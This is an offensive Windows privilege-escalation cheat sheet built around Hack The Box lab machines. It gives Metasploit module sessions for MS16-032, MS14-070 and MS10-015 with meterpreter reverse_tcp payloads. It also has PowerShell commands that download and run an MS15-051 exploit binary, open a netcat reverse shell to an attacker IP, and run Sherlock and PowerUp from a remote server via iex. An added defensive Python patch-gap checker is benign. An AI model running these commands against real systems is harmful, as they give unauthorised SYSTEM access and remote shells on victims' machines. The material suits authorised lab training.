# Windows

## Cheatsheet

{% embed url="https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/" %}

## Vulnerabilities for Privesc

### MS16-032 (Secondary Logon to Address Elevation of Privilege)

{% embed url="https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032" %}

{% embed url="https://www.rapid7.com/db/modules/exploit/windows/local/ms16_032_secondary_logon_handle_privesc" %}

> This module exploits the lack of sanitization of standard handles in Windows’ Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.

```
msf > use exploit/windows/local/ppr_flatten_rec
msf exploit(windows/local/ppr_flatten_rec) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/local/ppr_flatten_rec) > set lhost 10.10.14.21
lhost => 10.10.14.21
msf exploit(windows/local/ppr_flatten_rec) > set lport 1234
lport => 1234
msf exploit(windows/local/ppr_flatten_rec) > set session 2
session => 2
msf exploit(windows/local/ppr_flatten_rec) > run
```

You can test it on Hack The Box "Grandpa":

- OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
- OS Version: 5.2.3790 Service Pack 2 Build 3790
- Hotfix(s): N/A

### MS15-051 (Windows Kernel-Mode Drivers Could Allow Elevation of Privilege)

> This security update resolves vulnerabilities in Microsoft Windows. The more severe of these vulnerabilities could allow elevation of privilege if an attacker logs on locally and runs arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability cannot be exploited remotely or by anonymous users.

{% embed url="https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-051" %}

{% embed url="https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051" %}

```
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.9:8000/ms15-051x64.exe', 'C:\inetpub\drupal-7.54\ms15-051x64.exe')
ms15-051x64.exe "nc64.exe -e cmd 10.10.14.9 1234"
```

You can test it on Hack The Box "Bastard":

- OS Name: Microsoft Windows Server 2008 R2 Datacenter
- OS Version: 6.1.7600 N/A Build 7600
- Hotfix(s): N/A

### MS14-070 (TCP/IP Could Allow Elevation of Privilege)

{% embed url="https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-070" %}

{% embed url="https://www.rapid7.com/db/modules/exploit/windows/local/ms14_070_tcpip_ioctl" %}

> A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys can allow a local attacker to trigger a NULL pointer dereference by using a specially crafted IOCTL. This flaw can be abused to elevate privileges to SYSTEM.

```
msf > use exploit/windows/local/ms14_070_tcpip_ioctl
msf exploit(windows/local/ms14_070_tcpip_ioctl) > set session 3
session => 3
msf exploit(windows/local/ms14_070_tcpip_ioctl) > run
```

You can test it on Hack The Box "Granny":

- OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
- OS Version: 5.2.3790 Service Pack 2 Build 3790
- Hotfix(s): Q147222

### MS10-015 (Windows Kernel Could Allow Elevation of Privilege)

{% embed url="https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-015" %}

{% embed url="https://www.rapid7.com/db/modules/exploit/windows/local/ms10_015_kitrap0d" %}

> This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.

```
msf > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(windows/local/ms10_015_kitrap0d) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.25
lhost => 10.10.14.25
msf exploit(windows/local/ms10_015_kitrap0d) > set lport 1234
lport => 1234
msf exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf exploit(windows/local/ms10_015_kitrap0d) > run
```

You can test it on Hack The Box "Devel":

- OS Name: Microsoft Windows 7 Enterprise
- OS Version: 6.1.7600 N/A Build 7600
- Hotfix(s): N/A

## Tools

### Windows Exploit Suggester


{% embed url="https://github.com/AonCyberLabs/Windows-Exploit-Suggester" %}
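As the defensive counterpart to the exploit suggesters in this section, here is an added example (not part of this page, of Windows Exploit Suggester or of Metasploit) that parses `systeminfo` output for OS version, architecture and installed hotfixes and reports which of the bulletins above still apply to the host. The sample output is constructed to match the "Grandpa" listing, and the bulletin-to-KB mapping is an assumption to verify against the linked bulletins.

```python
import re

# Constructed sample: the kind of `systeminfo` output the box listings on this page come from.
SAMPLE_SYSTEMINFO = """\
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
System Type:               X86-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: Q147222
                           [02]: KB977165
"""

# Bulletin -> KB articles that fix it (assumed from the Microsoft bulletins linked on this
# page; KB numbers vary per platform, so confirm against the bulletin before trusting a hit).
BULLETIN_KBS = {
    "MS10-015": {"KB977165"},
    "MS14-070": {"KB2989935"},
    "MS15-051": {"KB3045171"},
    "MS16-032": {"KB3139914"},
}
# Limits taken from the module descriptions quoted above: MS16-032 affects Windows 7-10 and
# 2008-2012 (NT 6.x and later); the MS10-015 module is not supported on x64 editions.
MIN_NT_MAJOR = {"MS16-032": 6}
X86_ONLY = {"MS10-015"}

def parse_systeminfo(text):
    """Return (NT major version, 'x86' or 'x64', set of installed KB/Q hotfix ids)."""
    m = re.search(r"^OS Version:\s*(\d+)\.\d+\.\d+", text, re.M)
    major = int(m.group(1)) if m else 0
    t = re.search(r"^System Type:\s*(\S+)", text, re.M)
    arch = "x64" if t and t.group(1).lower().startswith("x64") else "x86"
    hotfixes = {h.upper() for h in re.findall(r"\[\d+\]:\s*((?:KB|Q)\d+)", text, re.I)}
    return major, arch, hotfixes

def missing_patches(text, bulletin_kbs=BULLETIN_KBS):
    """Bulletins that apply to this host and for which none of the fixing KBs is installed."""
    major, arch, installed = parse_systeminfo(text)
    missing = []
    for bulletin, kbs in sorted(bulletin_kbs.items()):
        if kbs & installed:
            continue  # already patched
        if major < MIN_NT_MAJOR.get(bulletin, 0):
            continue  # OS release predates the affected range
        if arch == "x64" and bulletin in X86_ONLY:
            continue  # the listed module cannot be used here anyway
        missing.append(bulletin)
    return missing

if __name__ == "__main__":
    print(missing_patches(SAMPLE_SYSTEMINFO))  # ['MS14-070', 'MS15-051']
```

Feed it the saved `systeminfo` output of a host to get a quick patch-gap list for the four bulletins on this page.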

### Local Exploit Suggester with MSF

```
msf > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf post(multi/recon/local_exploit_suggester) > run
```

### Sherlock.ps1 > Find-AllVulns

```
powershell.exe -c "iex ((new-object net.webclient).DownloadString('http://10.10.14.9:8000/Sherlock.ps1')); Find-AllVulns"
```

{% embed url="https://github.com/rasta-mouse/Sherlock" %}

### PowerSploit > PowerUp.ps1 > Invoke-AllChecks

```
locate -i PowerUp.ps1
/usr/lib/python2.7/dist-packages/cme/data/PowerSploit/Privesc/PowerUp.ps1

powershell.exe -c "iex ((new-object net.webclient).DownloadString('http://10.10.14.9:8000/PowerUp.ps1')); Invoke-AllChecks"
```

### Mimikatz

{% embed url="https://www.hackingarticles.in/understanding-guide-mimikatz/" %}
